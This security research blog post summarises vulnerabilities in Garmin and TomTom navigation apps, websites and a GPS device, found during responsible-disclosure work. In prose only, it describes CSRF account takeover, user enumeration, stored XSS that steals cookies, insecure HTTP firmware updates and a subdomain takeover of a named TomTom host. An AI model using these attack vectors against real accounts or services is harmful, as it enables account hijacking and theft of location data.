In the United States alone, 84% of adults are using navigation applications, according to a recent Gallup poll. Whether they’re downloading it in an app store or the navigation capability is already built into the car, these navigation tools are taking us to the grocery store, to our grandparents’ house, to job interviews, and everywhere in between and beyond. People around the world pull out devices and launch the navigation apps that lead millions to their destinations every day.
(In)Security in Navigation AppsThe Checkmarx Security Research Team decided to take a look into the navigation apps from two well-known GPS navigation makers: Garmin and TomTom. As the industry has moved from dedicated GPS navigation devices into smart phone apps for iOS and Android, so have Garmin and TomTom, reaching into our phones, cars and all the way into watches and other wearables. It’s incredibly useful, but how successful have these companies been at developing security into their apps?
Garmin: Vulnerabilities and RemediationOn the Garmin Android app, our team found several vulnerabilities. These vulnerabilities can result in a Garmin account takeover, which means that a hacker may have access to all of the user’s data stored in the Garmin account. This data may include private, personal information and location. Other vulnerabilities we discovered enable an attacker to lock users out of their account. That’s considered a Denial of Service attack, or DoS. On Garmin’s web apps (their websites) we found many more vulnerabilities. These vulnerabilities indicate that they lack insight into some aspects of application security when developing the apps. Some of the vulnerabilities may allow hackers to get the names of users from the website, which is very helpful for crafting successful phishing attacks. Others may leak sensitive information, including their names and locations, while others may even allow an attacker to cause a user to download malware. We contacted Garmin with a detailed report, showing where we found issues in their web applications and Android apps. In our research, we ordered the list based on the CVSS 3 score calculator and provided possible attack scenarios for several security issues. Here are a few of the vulnerabilities we discovered:
- CSRF - Account takeover on SSO endpoint. Attack vector: When a user resets their password, a temporary password is sent via email. When the user tries to login with this temporary password, a new password can be set. However, the endpoint does not check the referrer and there is no CSRF token to avoid the possibility of an external request.
- Username and group enumeration on Garmin Connect. Attack vector: It’s possible for a malicious user to get all the users and groups, bypassing the pagination and characters limitations on the Garmin Connect system. There’s also the danger of information denial of service due to large quantities of data requested.
- App Crash and Denial of Service. Attack vector: In certain scenarios it’s possible to crash the Garmin Connect app of the victim, creating a denial of service attack.
TomTom: Vulnerabilities and RemediationOur research scope included TomTom web applications, Android applications (TomTom MyDrive and TomTom GPS Traffic) and the Go 520 GPS device. We were sorry to find a plethora of vulnerabilities in all of them. A few of the security issues we found included:
- An exposed database. Attack vector: This database carries a lot of sensitive information and serves download links to users, which means it could be abused by an attacker to change the links to point towards malware.
- A GO 520 GPS device that gets updates using unencrypted HTTP. Attack vector: Could allow Man-in-the-Middle attacks to change the update URL to rogue malware that can damage, backdoor, or even be used to track unsuspecting users.
- Stored XSS and CSRF. Attack vector: Accounts can be hijacked using a combination of Stored XSS and CSRF. A victim that will visit a specially crafted page that automatically changes the billing information of the user. A Stored XSS payload is located in the shipping street field, which sends cookie details to a remote webserver. That way, attackers could steal users’ accounts; trigger a malware download; change users’ information, and more. After the attacker hijacks the user account they have access to data that’s input into the device – including the places you typically go, road trips you take, places of interest. This data could be exploited or used by anyone.
- Subdomain takeover. Attack vector: It’s possible to register an Amazon AWS bucket that is pointing to christmas.tomtom.com and get that domain to trick victims. Having CNAME records unused is a good weapon for malicious users.